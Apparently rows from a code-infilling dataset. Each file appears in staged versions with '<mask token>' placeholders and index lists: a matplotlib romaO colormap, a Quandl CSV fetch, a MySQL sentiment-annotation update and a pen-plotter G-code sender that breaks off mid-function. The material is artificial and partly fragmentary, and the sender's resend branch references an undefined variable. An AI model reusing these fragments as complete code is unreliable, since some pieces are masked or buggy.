0.25815, 0.43921], [0.40974, 0.25466, 0.43212], [0.4129, 0.25132,
0.42509], [0.41602, 0.24817, 0.41813], [0.41912, 0.24515, 0.41128], [
0.42218, 0.24235, 0.40451], [0.42522, 0.23972, 0.39784], [0.42823,
0.23728, 0.39126], [0.43121, 0.23498, 0.38475], [0.43415, 0.23282,
0.37836], [0.43708, 0.23086, 0.37204], [0.43998, 0.22907, 0.36583], [
0.44286, 0.22743, 0.3597], [0.44571, 0.22596, 0.35366], [0.44855,
0.2246, 0.34773]]
romaO_map = LinearSegmentedColormap.from_list('romaO', cm_data)
test_cm = romaO_map
if __name__ == '__main__':
import matplotlib.pyplot as plt
import numpy as np
try:
from viscm import viscm
viscm(romaO_map)
except ImportError:
print('viscm not found, falling back on simple display')
plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto', cmap=
romaO_map)
plt.show()
| from matplotlib.colors import LinearSegmentedColormap
cm_data = [[0.45137, 0.22346, 0.34187], [0.45418, 0.22244, 0.3361], [
0.45696, 0.22158, 0.33043], [0.45975, 0.2209, 0.32483], [0.46251,
0.22035, 0.31935], [0.46527, 0.21994, 0.31394], [0.46803, 0.21968,
0.30862], [0.47078, 0.21958, 0.30337], [0.47352, 0.21962, 0.29822], [
0.47628, 0.21982, 0.29316], [0.47902, 0.22017, 0.28818], [0.48178,
0.22067, 0.2833], [0.48453, 0.2213, 0.2785], [0.48731, 0.22208, 0.27379
], [0.49008, 0.22304, 0.26917], [0.49286, 0.22411, 0.26461], [0.49567,
0.22536, 0.26016], [0.4985, 0.22677, 0.25579], [0.50134, 0.22833,
0.25153], [0.50419, 0.22999, 0.24733], [0.50707, 0.23188, 0.24322], [
0.50997, 0.23387, 0.23923], [0.5129, 0.23605, 0.23533], [0.51584,
0.23835, 0.23151], [0.51884, 0.24082, 0.22779], [0.52184, 0.24345,
0.22414], [0.52489, 0.24625, 0.22065], [0.52797, 0.2492, 0.2172], [
0.53108, 0.25231, 0.21387], [0.53423, 0.25556, 0.21064], [0.53742,
0.25899, 0.20753], [0.54063, 0.26255, 0.20452], [0.54389, 0.26628,
0.20158], [0.54718, 0.27017, 0.19879], [0.55051, 0.27419, 0.19613], [
0.55389, 0.27839, 0.19356], [0.55731, 0.28273, 0.19109], [0.56075,
0.2872, 0.18877], [0.56424, 0.29186, 0.18655], [0.56777, 0.29665,
0.18446], [0.57134, 0.30157, 0.18248], [0.57495, 0.30666, 0.18065], [
0.5786, 0.31186, 0.17898], [0.58228, 0.31724, 0.17743], [0.58602,
0.32275, 0.17597], [0.58977, 0.32838, 0.17473], [0.59358, 0.33415,
0.17358], [0.59742, 0.34005, 0.17261], [0.60129, 0.34606, 0.17179], [
0.60519, 0.35223, 0.17114], [0.60915, 0.35851, 0.17065], [0.61311,
0.36491, 0.17034], [0.61713, 0.37143, 0.1702], [0.62118, 0.37808,
0.17023], [0.62526, 0.38483, 0.17046], [0.62937, 0.39171, 0.17087], [
0.63352, 0.39869, 0.17148], [0.63769, 0.40579, 0.17229], [0.6419,
0.41299, 0.17332], [0.64613, 0.42029, 0.17458], [0.65041, 0.42771,
0.176], [0.6547, 0.43522, 0.17774], [0.65904, 0.44283, 0.17962], [
0.66341, 0.45054, 0.18175], [0.6678, 0.45834, 0.18416], [0.67222,
0.46625, 0.1868], [0.67667, 0.47425, 0.18968], [0.68114, 0.48233,
0.19283], [0.68566, 0.49051, 0.19624], [0.69019, 0.49878, 0.19987], [
0.69474, 0.50712, 0.20384], [0.69933, 0.51554, 0.20803], [0.70394,
0.52406, 0.21251], [0.70858, 0.53265, 0.21726], [0.71322, 0.5413,
0.22229], [0.7179, 0.55003, 0.22761], [0.72257, 0.55881, 0.23318], [
0.72727, 0.56767, 0.23907], [0.73197, 0.57658, 0.24521], [0.73666,
0.58553, 0.25168], [0.74136, 0.59451, 0.25837], [0.74605, 0.60354,
0.26537], [0.75073, 0.61259, 0.27263], [0.75538, 0.62166, 0.28017], [
0.76001, 0.63075, 0.28796], [0.7646, 0.63982, 0.29602], [0.76914,
0.64889, 0.30433], [0.77363, 0.65793, 0.31287], [0.77806, 0.66694,
0.32165], [0.78242, 0.6759, 0.33066], [0.78669, 0.68481, 0.33988], [
0.79087, 0.69365, 0.34929], [0.79494, 0.7024, 0.35888], [0.7989,
0.71106, 0.36867], [0.80273, 0.71961, 0.37859], [0.80642, 0.72803,
0.38866], [0.80996, 0.73631, 0.39885], [0.81334, 0.74446, 0.40916], [
0.81655, 0.75244, 0.41957], [0.81956, 0.76025, 0.43004], [0.82239,
0.76787, 0.44057], [0.82501, 0.7753, 0.45115], [0.82742, 0.78252,
0.46174], [0.8296, 0.78953, 0.47235], [0.83155, 0.79631, 0.48293], [
0.83326, 0.80287, 0.49349], [0.83472, 0.80919, 0.50402], [0.83592,
0.81526, 0.51449], [0.83686, 0.82109, 0.52487], [0.83753, 0.82666,
0.53517], [0.83793, 0.83198, 0.54537], [0.83805, 0.83703, 0.55546], [
0.83788, 0.84182, 0.56542], [0.83744, 0.84635, 0.57525], [0.8367,
0.85061, 0.58493], [0.83567, 0.85462, 0.59446], [0.83435, 0.85835,
0.60382], [0.83274, 0.86183, 0.61301], [0.83084, 0.86504, 0.62202], [
0.82864, 0.868, 0.63085], [0.82615, 0.87068, 0.63949], [0.82337,
0.87312, 0.64792], [0.8203, 0.87531, 0.65617], [0.81695, 0.87724,
0.6642], [0.81331, 0.87892, 0.67203], [0.80939, 0.88036, 0.67964], [
0.80518, 0.88156, 0.68705], [0.80071, 0.8825, 0.69424], [0.79595,
0.88322, 0.70121], [0.79094, 0.8837, 0.70797], [0.78566, 0.88395,
0.7145], [0.78012, 0.88396, 0.72082], [0.77433, 0.88375, 0.72692], [
0.7683, 0.88331, 0.73279], [0.76203, 0.88264, 0.73844], [0.75553,
0.88177, 0.74387], [0.74879, 0.88066, 0.74908], [0.74184, 0.87934,
0.75407], [0.73468, 0.87781, 0.75884], [0.72731, 0.87607, 0.76339], [
0.71976, 0.87411, 0.76772], [0.71201, 0.87195, 0.77184], [0.70408,
0.86958, 0.77573], [0.69599, 0.86701, 0.77941], [0.68774, 0.86425,
0.78288], [0.67934, 0.86127, 0.78614], [0.67081, 0.85811, 0.78919], [
0.66215, 0.85476, 0.79202], [0.65336, 0.8512, 0.79465], [0.64448,
0.84747, 0.79707], [0.6355, 0.84356, 0.7993], [0.62645, 0.83947,
0.80131], [0.61732, 0.83519, 0.80313], [0.60814, 0.83075, 0.80476], [
0.59891, 0.82614, 0.80619], [0.58965, 0.82137, 0.80743], [0.58037,
0.81644, 0.80848], [0.57108, 0.81135, 0.80935], [0.56181, 0.80612,
0.81004], [0.55255, 0.80074, 0.81055], [0.54332, 0.79522, 0.81088], [
0.53412, 0.78958, 0.81105], [0.525, 0.7838, 0.81105], [0.51593, 0.77791,
0.81088], [0.50695, 0.77189, 0.81055], [0.49808, 0.76577, 0.81007], [
0.48928, 0.75954, 0.80944], [0.48061, 0.75321, 0.80866], [0.47207,
0.7468, 0.80773], [0.46365, 0.74029, 0.80667], [0.45539, 0.7337,
0.80546], [0.44728, 0.72703, 0.80413], [0.43934, 0.7203, 0.80266], [
0.43158, 0.7135, 0.80107], [0.42398, 0.70664, 0.79936], [0.41658,
0.69971, 0.79752], [0.40938, 0.69275, 0.79557], [0.40237, 0.68572,
0.79351], [0.3956, 0.67865, 0.79133], [0.38903, 0.67155, 0.78905], [
0.38267, 0.66441, 0.78666], [0.37656, 0.65724, 0.78416], [0.37066,
0.65003, 0.78155], [0.36502, 0.64279, 0.77884], [0.35961, 0.63552,
0.77604], [0.35446, 0.62824, 0.77312], [0.34955, 0.62094, 0.77011], [
0.3449, 0.6136, 0.767], [0.34051, 0.60625, 0.76378], [0.33637, 0.59889,
0.76047], [0.33253, 0.59151, 0.75704], [0.32893, 0.58412, 0.75351], [
0.32559, 0.57671, 0.74987], [0.32256, 0.56928, 0.74613], [0.31978,
0.56186, 0.74228], [0.31727, 0.55441, 0.7383], [0.31505, 0.54695,
0.73422], [0.31311, 0.53948, 0.73002], [0.31144, 0.53201, 0.72569], [
0.31007, 0.52453, 0.72124], [0.30897, 0.51704, 0.71667], [0.30811,
0.50955, 0.71197], [0.30755, 0.50205, 0.70713], [0.30726, 0.49456,
0.70216], [0.30723, 0.48707, 0.69706], [0.30746, 0.47958, 0.69182], [
0.30795, 0.4721, 0.68643], [0.3087, 0.46463, 0.6809], [0.30968, 0.45716,
0.67525], [0.31088, 0.44973, 0.66944], [0.31228, 0.44232, 0.6635], [
0.31393, 0.43493, 0.65741], [0.31578, 0.42758, 0.65118], [0.3178,
0.42025, 0.64482], [0.32001, 0.41299, 0.63833], [0.32238, 0.40577,
0.6317], [0.32489, 0.39861, 0.62495], [0.32755, 0.39152, 0.61809], [
0.33035, 0.38448, 0.61111], [0.33327, 0.37755, 0.60402], [0.33627,
0.37068, 0.59684], [0.33939, 0.36392, 0.58955], [0.34257, 0.35728,
0.58219], [0.3458, 0.35073, 0.57476], [0.34912, 0.34428, 0.56727], [
0.35247, 0.33797, 0.55971], [0.35587, 0.33179, 0.55212], [0.35927,
0.32574, 0.54448], [0.36271, 0.31986, 0.53684], [0.36617, 0.31411,
0.52917], [0.36961, 0.30852, 0.52148], [0.37306, 0.30306, 0.51382], [
0.37652, 0.2978, 0.50615], [0.37994, 0.29269, 0.49854], [0.38336,
0.28775, 0.49094], [0.38674, 0.28301, 0.48337], [0.39011, 0.27842,
0.47586], [0.39346, 0.27401, 0.4684], [0.39677, 0.26978, 0.461], [
0.40006, 0.26573, 0.45366], [0.40333, 0.26185, 0.4464], [0.40655,
0.25815, 0.43921], [0.40974, 0.25466, 0.43212], [0.4129, 0.25132,
0.42509], [0.41602, 0.24817, 0.41813], [0.41912, 0.24515, 0.41128], [
0.42218, 0.24235, 0.40451], [0.42522, 0.23972, 0.39784], [0.42823,
0.23728, 0.39126], [0.43121, 0.23498, 0.38475], [0.43415, 0.23282,
0.37836], [0.43708, 0.23086, 0.37204], [0.43998, 0.22907, 0.36583], [
0.44286, 0.22743, 0.3597], [0.44571, 0.22596, 0.35366], [0.44855,
0.2246, 0.34773]]
romaO_map = LinearSegmentedColormap.from_list('romaO', cm_data)
test_cm = romaO_map
if __name__ == '__main__':
import matplotlib.pyplot as plt
import numpy as np
try:
from viscm import viscm
viscm(romaO_map)
except ImportError:
print('viscm not found, falling back on simple display')
plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto', cmap=
romaO_map)
plt.show()
| #
# romaO
# www.fabiocrameri.ch/colourmaps
from matplotlib.colors import LinearSegmentedColormap
cm_data = [[0.45137, 0.22346, 0.34187],
[0.45418, 0.22244, 0.3361],
[0.45696, 0.22158, 0.33043],
[0.45975, 0.2209, 0.32483],
[0.46251, 0.22035, 0.31935],
[0.46527, 0.21994, 0.31394],
[0.46803, 0.21968, 0.30862],
[0.47078, 0.21958, 0.30337],
[0.47352, 0.21962, 0.29822],
[0.47628, 0.21982, 0.29316],
[0.47902, 0.22017, 0.28818],
[0.48178, 0.22067, 0.2833],
[0.48453, 0.2213, 0.2785],
[0.48731, 0.22208, 0.27379],
[0.49008, 0.22304, 0.26917],
[0.49286, 0.22411, 0.26461],
[0.49567, 0.22536, 0.26016],
[0.4985, 0.22677, 0.25579],
[0.50134, 0.22833, 0.25153],
[0.50419, 0.22999, 0.24733],
[0.50707, 0.23188, 0.24322],
[0.50997, 0.23387, 0.23923],
[0.5129, 0.23605, 0.23533],
[0.51584, 0.23835, 0.23151],
[0.51884, 0.24082, 0.22779],
[0.52184, 0.24345, 0.22414],
[0.52489, 0.24625, 0.22065],
[0.52797, 0.2492, 0.2172],
[0.53108, 0.25231, 0.21387],
[0.53423, 0.25556, 0.21064],
[0.53742, 0.25899, 0.20753],
[0.54063, 0.26255, 0.20452],
[0.54389, 0.26628, 0.20158],
[0.54718, 0.27017, 0.19879],
[0.55051, 0.27419, 0.19613],
[0.55389, 0.27839, 0.19356],
[0.55731, 0.28273, 0.19109],
[0.56075, 0.2872, 0.18877],
[0.56424, 0.29186, 0.18655],
[0.56777, 0.29665, 0.18446],
[0.57134, 0.30157, 0.18248],
[0.57495, 0.30666, 0.18065],
[0.5786, 0.31186, 0.17898],
[0.58228, 0.31724, 0.17743],
[0.58602, 0.32275, 0.17597],
[0.58977, 0.32838, 0.17473],
[0.59358, 0.33415, 0.17358],
[0.59742, 0.34005, 0.17261],
[0.60129, 0.34606, 0.17179],
[0.60519, 0.35223, 0.17114],
[0.60915, 0.35851, 0.17065],
[0.61311, 0.36491, 0.17034],
[0.61713, 0.37143, 0.1702],
[0.62118, 0.37808, 0.17023],
[0.62526, 0.38483, 0.17046],
[0.62937, 0.39171, 0.17087],
[0.63352, 0.39869, 0.17148],
[0.63769, 0.40579, 0.17229],
[0.6419, 0.41299, 0.17332],
[0.64613, 0.42029, 0.17458],
[0.65041, 0.42771, 0.176],
[0.6547, 0.43522, 0.17774],
[0.65904, 0.44283, 0.17962],
[0.66341, 0.45054, 0.18175],
[0.6678, 0.45834, 0.18416],
[0.67222, 0.46625, 0.1868],
[0.67667, 0.47425, 0.18968],
[0.68114, 0.48233, 0.19283],
[0.68566, 0.49051, 0.19624],
[0.69019, 0.49878, 0.19987],
[0.69474, 0.50712, 0.20384],
[0.69933, 0.51554, 0.20803],
[0.70394, 0.52406, 0.21251],
[0.70858, 0.53265, 0.21726],
[0.71322, 0.5413, 0.22229],
[0.7179, 0.55003, 0.22761],
[0.72257, 0.55881, 0.23318],
[0.72727, 0.56767, 0.23907],
[0.73197, 0.57658, 0.24521],
[0.73666, 0.58553, 0.25168],
[0.74136, 0.59451, 0.25837],
[0.74605, 0.60354, 0.26537],
[0.75073, 0.61259, 0.27263],
[0.75538, 0.62166, 0.28017],
[0.76001, 0.63075, 0.28796],
[0.7646, 0.63982, 0.29602],
[0.76914, 0.64889, 0.30433],
[0.77363, 0.65793, 0.31287],
[0.77806, 0.66694, 0.32165],
[0.78242, 0.6759, 0.33066],
[0.78669, 0.68481, 0.33988],
[0.79087, 0.69365, 0.34929],
[0.79494, 0.7024, 0.35888],
[0.7989, 0.71106, 0.36867],
[0.80273, 0.71961, 0.37859],
[0.80642, 0.72803, 0.38866],
[0.80996, 0.73631, 0.39885],
[0.81334, 0.74446, 0.40916],
[0.81655, 0.75244, 0.41957],
[0.81956, 0.76025, 0.43004],
[0.82239, 0.76787, 0.44057],
[0.82501, 0.7753, 0.45115],
[0.82742, 0.78252, 0.46174],
[0.8296, 0.78953, 0.47235],
[0.83155, 0.79631, 0.48293],
[0.83326, 0.80287, 0.49349],
[0.83472, 0.80919, 0.50402],
[0.83592, 0.81526, 0.51449],
[0.83686, 0.82109, 0.52487],
[0.83753, 0.82666, 0.53517],
[0.83793, 0.83198, 0.54537],
[0.83805, 0.83703, 0.55546],
[0.83788, 0.84182, 0.56542],
[0.83744, 0.84635, 0.57525],
[0.8367, 0.85061, 0.58493],
[0.83567, 0.85462, 0.59446],
[0.83435, 0.85835, 0.60382],
[0.83274, 0.86183, 0.61301],
[0.83084, 0.86504, 0.62202],
[0.82864, 0.868, 0.63085],
[0.82615, 0.87068, 0.63949],
[0.82337, 0.87312, 0.64792],
[0.8203, 0.87531, 0.65617],
[0.81695, 0.87724, 0.6642],
[0.81331, 0.87892, 0.67203],
[0.80939, 0.88036, 0.67964],
[0.80518, 0.88156, 0.68705],
[0.80071, 0.8825, 0.69424],
[0.79595, 0.88322, 0.70121],
[0.79094, 0.8837, 0.70797],
[0.78566, 0.88395, 0.7145],
[0.78012, 0.88396, 0.72082],
[0.77433, 0.88375, 0.72692],
[0.7683, 0.88331, 0.73279],
[0.76203, 0.88264, 0.73844],
[0.75553, 0.88177, 0.74387],
[0.74879, 0.88066, 0.74908],
[0.74184, 0.87934, 0.75407],
[0.73468, 0.87781, 0.75884],
[0.72731, 0.87607, 0.76339],
[0.71976, 0.87411, 0.76772],
[0.71201, 0.87195, 0.77184],
[0.70408, 0.86958, 0.77573],
[0.69599, 0.86701, 0.77941],
[0.68774, 0.86425, 0.78288],
[0.67934, 0.86127, 0.78614],
[0.67081, 0.85811, 0.78919],
[0.66215, 0.85476, 0.79202],
[0.65336, 0.8512, 0.79465],
[0.64448, 0.84747, 0.79707],
[0.6355, 0.84356, 0.7993],
[0.62645, 0.83947, 0.80131],
[0.61732, 0.83519, 0.80313],
[0.60814, 0.83075, 0.80476],
[0.59891, 0.82614, 0.80619],
[0.58965, 0.82137, 0.80743],
[0.58037, 0.81644, 0.80848],
[0.57108, 0.81135, 0.80935],
[0.56181, 0.80612, 0.81004],
[0.55255, 0.80074, 0.81055],
[0.54332, 0.79522, 0.81088],
[0.53412, 0.78958, 0.81105],
[0.525, 0.7838, 0.81105],
[0.51593, 0.77791, 0.81088],
[0.50695, 0.77189, 0.81055],
[0.49808, 0.76577, 0.81007],
[0.48928, 0.75954, 0.80944],
[0.48061, 0.75321, 0.80866],
[0.47207, 0.7468, 0.80773],
[0.46365, 0.74029, 0.80667],
[0.45539, 0.7337, 0.80546],
[0.44728, 0.72703, 0.80413],
[0.43934, 0.7203, 0.80266],
[0.43158, 0.7135, 0.80107],
[0.42398, 0.70664, 0.79936],
[0.41658, 0.69971, 0.79752],
[0.40938, 0.69275, 0.79557],
[0.40237, 0.68572, 0.79351],
[0.3956, 0.67865, 0.79133],
[0.38903, 0.67155, 0.78905],
[0.38267, 0.66441, 0.78666],
[0.37656, 0.65724, 0.78416],
[0.37066, 0.65003, 0.78155],
[0.36502, 0.64279, 0.77884],
[0.35961, 0.63552, 0.77604],
[0.35446, 0.62824, 0.77312],
[0.34955, 0.62094, 0.77011],
[0.3449, 0.6136, 0.767],
[0.34051, 0.60625, 0.76378],
[0.33637, 0.59889, 0.76047],
[0.33253, 0.59151, 0.75704],
[0.32893, 0.58412, 0.75351],
[0.32559, 0.57671, 0.74987],
[0.32256, 0.56928, 0.74613],
[0.31978, 0.56186, 0.74228],
[0.31727, 0.55441, 0.7383],
[0.31505, 0.54695, 0.73422],
[0.31311, 0.53948, 0.73002],
[0.31144, 0.53201, 0.72569],
[0.31007, 0.52453, 0.72124],
[0.30897, 0.51704, 0.71667],
[0.30811, 0.50955, 0.71197],
[0.30755, 0.50205, 0.70713],
[0.30726, 0.49456, 0.70216],
[0.30723, 0.48707, 0.69706],
[0.30746, 0.47958, 0.69182],
[0.30795, 0.4721, 0.68643],
[0.3087, 0.46463, 0.6809],
[0.30968, 0.45716, 0.67525],
[0.31088, 0.44973, 0.66944],
[0.31228, 0.44232, 0.6635],
[0.31393, 0.43493, 0.65741],
[0.31578, 0.42758, 0.65118],
[0.3178, 0.42025, 0.64482],
[0.32001, 0.41299, 0.63833],
[0.32238, 0.40577, 0.6317],
[0.32489, 0.39861, 0.62495],
[0.32755, 0.39152, 0.61809],
[0.33035, 0.38448, 0.61111],
[0.33327, 0.37755, 0.60402],
[0.33627, 0.37068, 0.59684],
[0.33939, 0.36392, 0.58955],
[0.34257, 0.35728, 0.58219],
[0.3458, 0.35073, 0.57476],
[0.34912, 0.34428, 0.56727],
[0.35247, 0.33797, 0.55971],
[0.35587, 0.33179, 0.55212],
[0.35927, 0.32574, 0.54448],
[0.36271, 0.31986, 0.53684],
[0.36617, 0.31411, 0.52917],
[0.36961, 0.30852, 0.52148],
[0.37306, 0.30306, 0.51382],
[0.37652, 0.2978, 0.50615],
[0.37994, 0.29269, 0.49854],
[0.38336, 0.28775, 0.49094],
[0.38674, 0.28301, 0.48337],
[0.39011, 0.27842, 0.47586],
[0.39346, 0.27401, 0.4684],
[0.39677, 0.26978, 0.461],
[0.40006, 0.26573, 0.45366],
[0.40333, 0.26185, 0.4464],
[0.40655, 0.25815, 0.43921],
[0.40974, 0.25466, 0.43212],
[0.4129, 0.25132, 0.42509],
[0.41602, 0.24817, 0.41813],
[0.41912, 0.24515, 0.41128],
[0.42218, 0.24235, 0.40451],
[0.42522, 0.23972, 0.39784],
[0.42823, 0.23728, 0.39126],
[0.43121, 0.23498, 0.38475],
[0.43415, 0.23282, 0.37836],
[0.43708, 0.23086, 0.37204],
[0.43998, 0.22907, 0.36583],
[0.44286, 0.22743, 0.3597],
[0.44571, 0.22596, 0.35366],
[0.44855, 0.2246, 0.34773]]
romaO_map = LinearSegmentedColormap.from_list('romaO', cm_data)
# For use of "viscm view"
test_cm = romaO_map
if __name__ == "__main__":
import matplotlib.pyplot as plt
import numpy as np
try:
from viscm import viscm
viscm(romaO_map)
except ImportError:
print("viscm not found, falling back on simple display")
plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto',
cmap=romaO_map)
plt.show()
| [
0,
1,
2,
3,
4
] |
46 | 3dd4b4d4241e588cf44230891f496bafb30c6153 | <mask token>
| <mask token>
print(df.head())
| <mask token>
n1 = 'ADS'
api_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1
df = pd.read_csv(api_url)
df = df.head(100)
print(df.head())
| import requests
import json
import pandas as pd
n1 = 'ADS'
api_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1
df = pd.read_csv(api_url)
df = df.head(100)
print(df.head())
|
import requests
import json
import pandas as pd
n1 = 'ADS'
api_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1
df = pd.read_csv(api_url)
df = df.head(100)
print(df.head())
#print(list(data))
| [
0,
1,
2,
3,
4
] |
47 | a558b42106b036719fe38ee6efd1c5b933290f52 | <mask token>
| <mask token>
connection.execute(stmt)
func.update_annotations_db(Twitter_Sentiment_Analysis, connection,
'Export_csv5.csv')
| <mask token>
connection, Twitter_Sentiment_Analysis = func.Database_Acces(
'mysql://root@localhost/sentiment?charset=utf8mb4', 'utf8',
'Twitter_Sentiment_Analysis4')
stmt = "SET NAMES 'UTF8';"
connection.execute(stmt)
func.update_annotations_db(Twitter_Sentiment_Analysis, connection,
'Export_csv5.csv')
| from sqlalchemy import select, update
from sqlalchemy import Table, Column, String, Integer, Float, Boolean, Date, BigInteger
from sqlalchemy import create_engine, MetaData
import API_and_Database_function as func
import pandas as pd
import re
connection, Twitter_Sentiment_Analysis = func.Database_Acces(
'mysql://root@localhost/sentiment?charset=utf8mb4', 'utf8',
'Twitter_Sentiment_Analysis4')
stmt = "SET NAMES 'UTF8';"
connection.execute(stmt)
func.update_annotations_db(Twitter_Sentiment_Analysis, connection,
'Export_csv5.csv')
| #!/usr/local/bin/python
# -*- coding: utf-8 -*-
from sqlalchemy import select, update
from sqlalchemy import Table, Column, String, Integer, Float, Boolean, Date, BigInteger
from sqlalchemy import create_engine, MetaData
import API_and_Database_function as func
import pandas as pd
import re
connection, Twitter_Sentiment_Analysis = func.Database_Acces("mysql://root@localhost/sentiment?charset=utf8mb4", 'utf8' , 'Twitter_Sentiment_Analysis4' )
stmt = "SET NAMES 'UTF8';"
connection.execute(stmt)
func.update_annotations_db(Twitter_Sentiment_Analysis, connection, "Export_csv5.csv") | [
0,
1,
2,
3,
4
] |
48 | 10d35ba3c04d9cd09e152c575e74b0382ff60572 | <mask token>
class GcodeSender(object):
<mask token>
<mask token>
def __init__(self, **kwargs):
super(GcodeSender, self).__init__(**kwargs)
self._stop = threading.Event()
self.parsing_thread = None
self.command_queue = Queue()
self.line_number = 1
self.plotter = None
dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=
dispatcher.Any)
dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',
sender=dispatcher.Any)
dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=
dispatcher.Any)
<mask token>
<mask token>
def on_pen_lift(self):
self.command_queue.put_nowait('M400')
self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)
)
self.command_queue.put_nowait('G4 P500')
<mask token>
def stop(self):
if self.plotter:
self.plotter.close()
self.plotter = None
<mask token>
def start_processing(self):
self.command_queue.put_nowait('M110 N2')
self.command_queue.put_nowait('G90')
self.command_queue.put_nowait('G28')
self.plotter = serial.Serial(PORT, 115200, timeout=1)
self._read_and_process_and_wait_for_ok(break_on_timeout=True)
while True:
while not self.command_queue.empty():
command = self.command_queue.get_nowait()
self.command_queue.task_done()
self._send_line(command)
self._read_and_process_and_wait_for_ok()
time.sleep(0.5)
<mask token>
def _read_line(self):
response = self.plotter.readline()
print('READ: {}'.format(response))
return response.decode('utf-8')
def _checksum(self, command):
checksum = 0
for char in command:
byte_char = char.encode('utf-8')
int_char = int.from_bytes(byte_char, 'big')
checksum = checksum ^ int_char
return checksum
def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):
response = self._read_line()
if not response.strip() and break_on_timeout:
return
previous_line_number = self.line_number - 1
while not response.startswith('ok'):
if response.startswith((f'rs {previous_line_number}',
f'Resend:{previous_line_number}')):
print('resend request: {}'.format(response))
self.line_number = self.line_number - 1
self._send_line(command)
response = self._read_line()
elif response.startswith(('rs', 'Resend')):
raise Exception(
'requested resend of some other line number: {}'.format
(response))
elif response.startswith('!!'):
raise Exception('printer fault')
elif response.startswith('//'):
print('comment: {}'.format(response))
response = self._read_line()
elif response.startswith('wait'):
response = self._read_line()
time.sleep(0.5)
elif response.startswith('start'):
return
else:
print('unknown response: {}'.format(response))
response = self._read_line()
<mask token>
| <mask token>
class GcodeSender(object):
<mask token>
<mask token>
def __init__(self, **kwargs):
super(GcodeSender, self).__init__(**kwargs)
self._stop = threading.Event()
self.parsing_thread = None
self.command_queue = Queue()
self.line_number = 1
self.plotter = None
dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=
dispatcher.Any)
dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',
sender=dispatcher.Any)
dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=
dispatcher.Any)
<mask token>
def on_pen_drop(self):
self.command_queue.put_nowait('M400')
self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)
)
self.command_queue.put_nowait('G4 S1')
def on_pen_lift(self):
self.command_queue.put_nowait('M400')
self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)
)
self.command_queue.put_nowait('G4 P500')
def start(self):
self._stop.clear()
self.parsing_thread = threading.Thread(target=self.start_processing)
self.parsing_thread.daemon = True
self.parsing_thread.start()
def stop(self):
if self.plotter:
self.plotter.close()
self.plotter = None
def __del__(self):
self.stop_thread()
self.stop()
def start_processing(self):
self.command_queue.put_nowait('M110 N2')
self.command_queue.put_nowait('G90')
self.command_queue.put_nowait('G28')
self.plotter = serial.Serial(PORT, 115200, timeout=1)
self._read_and_process_and_wait_for_ok(break_on_timeout=True)
while True:
while not self.command_queue.empty():
command = self.command_queue.get_nowait()
self.command_queue.task_done()
self._send_line(command)
self._read_and_process_and_wait_for_ok()
time.sleep(0.5)
def _send_line(self, line):
command = 'N{} {} '.format(self.line_number, line)
command = '{}*{}\n'.format(command, self._checksum(command))
self.line_number += 1
self.plotter.write(command.encode('utf-8'))
def _read_line(self):
response = self.plotter.readline()
print('READ: {}'.format(response))
return response.decode('utf-8')
def _checksum(self, command):
checksum = 0
for char in command:
byte_char = char.encode('utf-8')
int_char = int.from_bytes(byte_char, 'big')
checksum = checksum ^ int_char
return checksum
def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):
response = self._read_line()
if not response.strip() and break_on_timeout:
return
previous_line_number = self.line_number - 1
while not response.startswith('ok'):
if response.startswith((f'rs {previous_line_number}',
f'Resend:{previous_line_number}')):
print('resend request: {}'.format(response))
self.line_number = self.line_number - 1
self._send_line(command)
response = self._read_line()
elif response.startswith(('rs', 'Resend')):
raise Exception(
'requested resend of some other line number: {}'.format
(response))
elif response.startswith('!!'):
raise Exception('printer fault')
elif response.startswith('//'):
print('comment: {}'.format(response))
response = self._read_line()
elif response.startswith('wait'):
response = self._read_line()
time.sleep(0.5)
elif response.startswith('start'):
return
else:
print('unknown response: {}'.format(response))
response = self._read_line()
def stop_thread(self):
self._stop.set()
self.parsing_thread = None
| <mask token>
class GcodeSender(object):
<mask token>
<mask token>
def __init__(self, **kwargs):
super(GcodeSender, self).__init__(**kwargs)
self._stop = threading.Event()
self.parsing_thread = None
self.command_queue = Queue()
self.line_number = 1
self.plotter = None
dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=
dispatcher.Any)
dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',
sender=dispatcher.Any)
dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=
dispatcher.Any)
def on_move_to_point(self, x, y):
print('X{0:.3f} Y{1:.3f}'.format(x, y))
command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)
self.command_queue.put_nowait(command)
def on_pen_drop(self):
self.command_queue.put_nowait('M400')
self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)
)
self.command_queue.put_nowait('G4 S1')
def on_pen_lift(self):
self.command_queue.put_nowait('M400')
self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)
)
self.command_queue.put_nowait('G4 P500')
def start(self):
self._stop.clear()
self.parsing_thread = threading.Thread(target=self.start_processing)
self.parsing_thread.daemon = True
self.parsing_thread.start()
def stop(self):
if self.plotter:
self.plotter.close()
self.plotter = None
def __del__(self):
self.stop_thread()
self.stop()
def start_processing(self):
self.command_queue.put_nowait('M110 N2')
self.command_queue.put_nowait('G90')
self.command_queue.put_nowait('G28')
self.plotter = serial.Serial(PORT, 115200, timeout=1)
self._read_and_process_and_wait_for_ok(break_on_timeout=True)
while True:
while not self.command_queue.empty():
command = self.command_queue.get_nowait()
self.command_queue.task_done()
self._send_line(command)
self._read_and_process_and_wait_for_ok()
time.sleep(0.5)
def _send_line(self, line):
command = 'N{} {} '.format(self.line_number, line)
